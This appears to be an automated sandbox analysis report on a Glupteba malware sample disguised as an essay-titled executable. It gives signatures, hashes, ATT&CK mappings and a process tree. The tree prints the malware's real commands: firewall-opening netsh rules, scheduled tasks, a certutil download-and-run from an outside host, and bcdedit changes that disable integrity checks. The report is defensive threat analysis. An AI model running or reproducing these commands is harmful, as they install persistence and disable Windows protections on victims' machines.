Analysis

  • max time kernel
    119s
  • max time network
    122s
  • platform
    windows10_x64
  • resource
    win10-20220414-en
  • submitted
    16-05-2022 08:10

General

  • Target

    how_to_tame_a_wild_tongue_metaphor-RTMD-AH-RtF-GMAAAFzsCAEdCGQAmAGbBP4UA.exe

  • Size

    3.7MB

  • MD5

    81703610976f32d1c1f091cf3c9d672e

  • SHA1

    16c099c944685a8e597aef71ff1c78bdf190a0c4

  • SHA256

    7ebcfa350728f258d2df454a58ef1866c5ec430b575fd239518af3ec92c29984

  • SHA512

    818ed03701aaf1869172fd7be84cb4fd9380d9be6e7aa13b4cd65a68330bb8ff741623504672f056afb5d7881c73eb3d2ea31b52c953128fead19af7428c2e57

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 4 IoCs
  • Windows security bypass 2 TTPs
  • Modifies boot configuration data using bcdedit 15 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 3 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Possible attempt to disable PatchGuard 2 TTPs

    Rootkits can use kernel patching to embed themselves in an operating system.

  • Loads dropped DLL 4 IoCs
  • Windows security modification 2 TTPs 12 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in Windows directory 2 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 43 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\how_to_tame_a_wild_tongue_metaphor-RTMD-AH-RtF-GMAAAFzsCAEdCGQAmAGbBP4UA.exe
    "C:\Users\Admin\AppData\Local\Temp\how_to_tame_a_wild_tongue_metaphor-RTMD-AH-RtF-GMAAAFzsCAEdCGQAmAGbBP4UA.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:4696
    • C:\Users\Admin\AppData\Local\Temp\how_to_tame_a_wild_tongue_metaphor-RTMD-AH-RtF-GMAAAFzsCAEdCGQAmAGbBP4UA.exe
      "C:\Users\Admin\AppData\Local\Temp\how_to_tame_a_wild_tongue_metaphor-RTMD-AH-RtF-GMAAAFzsCAEdCGQAmAGbBP4UA.exe"
      2⤵
      • Windows security modification
      • Adds Run key to start application
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4820
      • C:\Windows\System32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5112
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
          • Modifies data under HKEY_USERS
          PID:3560
      • C:\Windows\System32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\6cfcca143217\6cfcca143217.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1368
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\6cfcca143217\6cfcca143217.exe" enable=yes
          4⤵
            PID:2032
        • C:\Windows\rss\csrss.exe
          C:\Windows\rss\csrss.exe /6-AH-RtF-GMAAAFzsCAEdCGQAmAGbBP4UA
          3⤵
          • Drops file in Drivers directory
          • Executes dropped EXE
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3152
          • C:\Windows\SYSTEM32\schtasks.exe
            schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
            4⤵
            • Creates scheduled task(s)
            PID:4100
          • C:\Windows\SYSTEM32\schtasks.exe
            schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://babsitef.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
            4⤵
            • Creates scheduled task(s)
            PID:4072
          • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
            "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:2232
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
              5⤵
              • Modifies boot configuration data using bcdedit
              PID:3612
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
              5⤵
              • Modifies boot configuration data using bcdedit
              PID:3792
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
              5⤵
              • Modifies boot configuration data using bcdedit
              PID:3724
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
              5⤵
              • Modifies boot configuration data using bcdedit
              PID:3344
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
              5⤵
              • Modifies boot configuration data using bcdedit
              PID:5024
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
              5⤵
              • Modifies boot configuration data using bcdedit
              PID:4916
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
              5⤵
              • Modifies boot configuration data using bcdedit
              PID:4580
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
              5⤵
              • Modifies boot configuration data using bcdedit
              PID:4276
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
              5⤵
              • Modifies boot configuration data using bcdedit
              PID:1940
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
              5⤵
              • Modifies boot configuration data using bcdedit
              PID:4416
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
              5⤵
              • Modifies boot configuration data using bcdedit
              PID:4360
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\system32\bcdedit.exe -timeout 0
              5⤵
              • Modifies boot configuration data using bcdedit
              PID:4384
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
              5⤵
              • Modifies boot configuration data using bcdedit
              PID:560
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\system32\bcdedit.exe -set bootmenupolicy legacy
              5⤵
              • Modifies boot configuration data using bcdedit
              PID:416
          • C:\Windows\System32\bcdedit.exe
            C:\Windows\Sysnative\bcdedit.exe /v
            4⤵
            • Modifies boot configuration data using bcdedit
            PID:1224
          • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
            C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
            4⤵
            • Drops file in Drivers directory
            • Executes dropped EXE
            PID:1288

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Execution

    Command-Line Interface

    1
    T1059

    Scheduled Task

    1
    T1053

    Persistence

    Modify Existing Service

    1
    T1031

    Registry Run Keys / Startup Folder

    1
    T1060

    Scheduled Task

    1
    T1053

    Privilege Escalation

    Scheduled Task

    1
    T1053

    Defense Evasion

    Disabling Security Tools

    2
    T1089

    Modify Registry

    3
    T1112

    Impair Defenses

    1
    T1562

    Discovery

    Query Registry

    1
    T1012

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
      Filesize

      94KB

      MD5

      d98e78fd57db58a11f880b45bb659767

      SHA1

      ab70c0d3bd9103c07632eeecee9f51d198ed0e76

      SHA256

      414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0

      SHA512

      aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

    • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
      Filesize

      94KB

      MD5

      d98e78fd57db58a11f880b45bb659767

      SHA1

      ab70c0d3bd9103c07632eeecee9f51d198ed0e76

      SHA256

      414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0

      SHA512

      aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

    • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
      Filesize

      1.7MB

      MD5

      13aaafe14eb60d6a718230e82c671d57

      SHA1

      e039dd924d12f264521b8e689426fb7ca95a0a7b

      SHA256

      f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

      SHA512

      ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

    • C:\Windows\rss\csrss.exe
      Filesize

      3.7MB

      MD5

      81703610976f32d1c1f091cf3c9d672e

      SHA1

      16c099c944685a8e597aef71ff1c78bdf190a0c4

      SHA256

      7ebcfa350728f258d2df454a58ef1866c5ec430b575fd239518af3ec92c29984

      SHA512

      818ed03701aaf1869172fd7be84cb4fd9380d9be6e7aa13b4cd65a68330bb8ff741623504672f056afb5d7881c73eb3d2ea31b52c953128fead19af7428c2e57

    • C:\Windows\rss\csrss.exe
      Filesize

      3.7MB

      MD5

      81703610976f32d1c1f091cf3c9d672e

      SHA1

      16c099c944685a8e597aef71ff1c78bdf190a0c4

      SHA256

      7ebcfa350728f258d2df454a58ef1866c5ec430b575fd239518af3ec92c29984

      SHA512

      818ed03701aaf1869172fd7be84cb4fd9380d9be6e7aa13b4cd65a68330bb8ff741623504672f056afb5d7881c73eb3d2ea31b52c953128fead19af7428c2e57

    • \Users\Admin\AppData\Local\Temp\dbghelp.dll
      Filesize

      1.5MB

      MD5

      f0616fa8bc54ece07e3107057f74e4db

      SHA1

      b33995c4f9a004b7d806c4bb36040ee844781fca

      SHA256

      6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026

      SHA512

      15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c

    • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
      Filesize

      7.9MB

      MD5

      335ee604bc5976ee83b38f3dddfed723

      SHA1

      2511136d8b9d34b521dd6d9d6c9bdd4c34a0e6ac

      SHA256

      8373267ef4dceb7999ccfa9c3c47e75c2623f5aa16a5e46baf2a394faaf5d77f

      SHA512

      87ad9512b45bcfcb0d1287788d88adb2563b003c960eb0e36185cbd2d038d878bee6768a1a6585a2f8ba98f294a8c56762af24f7c8cfc1afaf57e67e9ed5a9ee

    • \Users\Admin\AppData\Local\Temp\osloader.exe
      Filesize

      1.1MB

      MD5

      78c581e475d59efdebee2d3f4355f03f

      SHA1

      fda6c1f77f772afaa1b44a44c1fb29ee07434d10

      SHA256

      9f7e7ce0767d327ef0657b02a120f521d27444669587c5ccf282c9b199480aee

      SHA512

      35ed0fc3d9210af3c24a401500aebc8c31d77bb156c447602ca7e91f359931afbf2b69930d80c8fc412b5ba0b9cea8b22b7396f610b4224bbb77d765af042521

    • \Users\Admin\AppData\Local\Temp\symsrv.dll
      Filesize

      163KB

      MD5

      5c399d34d8dc01741269ff1f1aca7554

      SHA1

      e0ceed500d3cef5558f3f55d33ba9c3a709e8f55

      SHA256

      e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f

      SHA512

      8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

    • memory/416-152-0x0000000000000000-mapping.dmp
    • memory/560-151-0x0000000000000000-mapping.dmp
    • memory/1224-153-0x0000000000000000-mapping.dmp
    • memory/1288-154-0x0000000000000000-mapping.dmp
    • memory/1368-126-0x0000000000000000-mapping.dmp
    • memory/1940-147-0x0000000000000000-mapping.dmp
    • memory/2032-127-0x0000000000000000-mapping.dmp
    • memory/3152-132-0x0000000002D00000-0x00000000030AA000-memory.dmp
      Filesize

      3.7MB

    • memory/3152-133-0x0000000000400000-0x0000000000B16000-memory.dmp
      Filesize

      7.1MB

    • memory/3152-128-0x0000000000000000-mapping.dmp
    • memory/3344-142-0x0000000000000000-mapping.dmp
    • memory/3560-124-0x0000000000000000-mapping.dmp
    • memory/3612-139-0x0000000000000000-mapping.dmp
    • memory/3724-141-0x0000000000000000-mapping.dmp
    • memory/3792-140-0x0000000000000000-mapping.dmp
    • memory/4276-146-0x0000000000000000-mapping.dmp
    • memory/4360-149-0x0000000000000000-mapping.dmp
    • memory/4384-150-0x0000000000000000-mapping.dmp
    • memory/4416-148-0x0000000000000000-mapping.dmp
    • memory/4580-145-0x0000000000000000-mapping.dmp
    • memory/4696-118-0x0000000002960000-0x0000000002D18000-memory.dmp
      Filesize

      3.7MB

    • memory/4696-120-0x0000000000400000-0x0000000000B16000-memory.dmp
      Filesize

      7.1MB

    • memory/4696-119-0x0000000002D20000-0x000000000341C000-memory.dmp
      Filesize

      7.0MB

    • memory/4820-123-0x0000000002910000-0x0000000002CC2000-memory.dmp
      Filesize

      3.7MB

    • memory/4820-125-0x0000000000400000-0x0000000000B16000-memory.dmp
      Filesize

      7.1MB

    • memory/4916-144-0x0000000000000000-mapping.dmp
    • memory/5024-143-0x0000000000000000-mapping.dmp
    • memory/5112-122-0x0000000000000000-mapping.dmp